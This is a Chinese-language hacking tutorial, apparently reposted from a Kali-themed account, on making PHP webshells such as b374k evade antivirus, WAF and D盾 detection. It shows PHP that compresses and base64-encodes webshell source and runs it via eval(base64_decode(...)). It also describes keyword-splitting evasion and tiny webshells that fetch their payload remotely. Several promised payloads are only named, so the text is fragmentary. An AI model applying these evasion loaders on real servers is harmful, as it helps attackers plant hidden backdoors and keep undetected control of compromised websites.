php免杀木马的技巧
Posted kali黑客教学
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了php免杀木马的技巧相关的知识,希望对你有一定的参考价值。
php免杀木马的技巧
Part 1
常见PHP大马:
Part 2
大马后门检查: Fiddler抓包
审计代码
这里我以http://webshell8.com/ 这里的大马为例子演示
修改并运行脚本
Burp抓包或者右键查看原代码
修改并运行代码
再使用Burp抓个包
查找关键字Gethtml hmlogin localhost等
把上图的base64代码解密下
Part 3
大马源码免杀
这里我使用的是国外的一款大马b374k来进行免杀。
执行代码 eval 或 preg_replace的/e修饰符来执行大马代码。
$a = 'phpinfo();';
eval($a);
//eval执行php代码
编码
如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。 PHP免杀大马的奇淫技巧-ChaBug安全
$code= file_get_contents('D:phpStudyWWWTestlibhelp.txt'); //大马源码路径
$encode = base64_encode(gzdeflate($code)); //加密函数自己修改就行
echo $encode; //输出加密后代码
那我们来试试解码并执行刚刚base64加密的大马。
<?php
eval(base64_decode('刚刚加密的代码'));
?>
关键字免杀
类型这样的关键字如果没有混淆拆分是过不了waf的
eval(base64_decode('code'));
我们需要做的就是关键字免杀
免杀 payload 1 过狗过D盾 注意: code就是我们刚刚加密的base64代码。
Part 4
只有几百字节的大马
首先我们需要了解,几百字节是什么概念 1kb = 1024b
那么我们怎么实现呢,2种思路远程读取和远程下载
远程读取 payload
上传txt
远程下载 payload
免杀
注:部分段落引用网络文章,若有侵权联系我们删除。
更多教程 扫码关注
论坛:bbskali.cn
以上是关于php免杀木马的技巧的主要内容,如果未能解决你的问题,请参考以下文章